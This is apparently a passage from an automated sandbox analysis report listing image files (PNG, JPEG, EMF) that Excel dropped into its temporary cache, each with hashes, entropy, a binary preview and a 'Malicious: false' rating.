Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1CB70D9B.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26C6B888.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33795
Entropy (8bit):	7.909466841535462
Encrypted:	false
SSDEEP:	768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
MD5:	613C306C3CC7C3367595D71BEECD5DE4
SHA1:	CB5E280A2B1F4F1650040842BACC9D3DF916275E
SHA-256:	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
SHA-512:	FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."(.G.L.{'?..z.w.93..".........~....06\|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.\|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{...=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f\|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2AE58EE9.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F879DF.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\427D317C.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A496BE.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7788
Entropy (8bit):	5.5375562900215325
Encrypted:	false
SSDEEP:	96:w1kCHOvlJaX1/0qMfZoL/GuoOfaDda/ZbjsSZdb3Cim3n+KeXI:weTrZuloOSGZboS/C93n+KuI
MD5:	3554C9613971029E8DCF260667989F95
SHA1:	8AC68A6DF51DD4046DB89E0FCE2E6E54ED138D02
SHA-256:	3BA6C0370AC4F6588B5809C32A98AEE353822EA1FBE448477BC804B25612C925
SHA-512:	F74B0F905F76731A442D0FBBE8E233D29299BCAD11C603C36D6B1972EB27C5DE84D1D63027E6C53824A3E6B92DF286D4B0A31F04BE0FDAFB1F19F5A295CBF692
Malicious:	false
Preview:	....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................U.6.).X.....A.d...................../.@./...p....\...../......./.../...p....../.<5.u..p....`.p.bU.$y.w..6...I......./....w..6.$.......d.......$./..^.p.....^.p(.6...6...V...I.-...../..<.w................<.9u.Z.v....X.n.....bU........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\88F95BA7.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E7A67E3.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91D8F771.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.812375908425657
Encrypted:	false
SSDEEP:	3072:O34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:A4UcLe0JOcXuunhqcS
MD5:	E4ED5B488F68649C13F0BCBA9C6CB1CA
SHA1:	7E3925CCD54B9A28E843BC8113104533E61088FE
SHA-256:	5B0FF882D89EFAE34BE4D64E18199A1B84449CD5955A2B8F9F07C27F0792EBA2
SHA-512:	C47C9D0178B7755C0BB3DAF75841FE882ABF25B9294F526AD7F6E1B9435C770CEE9A9EC46CEB2572F9B24101E80B5E063B884E5086ACE5DF130F2D5E438AC55A
Malicious:	false
Preview:	....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$........f.Y.@..%...............\|.......RQ$[\|...t...........`...$Q$[\|...t... ...Id.Yt...\|... .........c..d.Y........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X...t........8.Y......c.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\995A17D6.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4BD1561.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B84A6782.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B8DA72E0.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33795
Entropy (8bit):	7.909466841535462
Encrypted:	false
SSDEEP:	768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
MD5:	613C306C3CC7C3367595D71BEECD5DE4
SHA1:	CB5E280A2B1F4F1650040842BACC9D3DF916275E
SHA-256:	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
SHA-512:	FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
Malicious:	false
Preview:	.PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."(.G.L.{'?..z.w.93..".........~....06\|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.\|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{...=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f\|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA97BBEE.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9A7A0EA.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
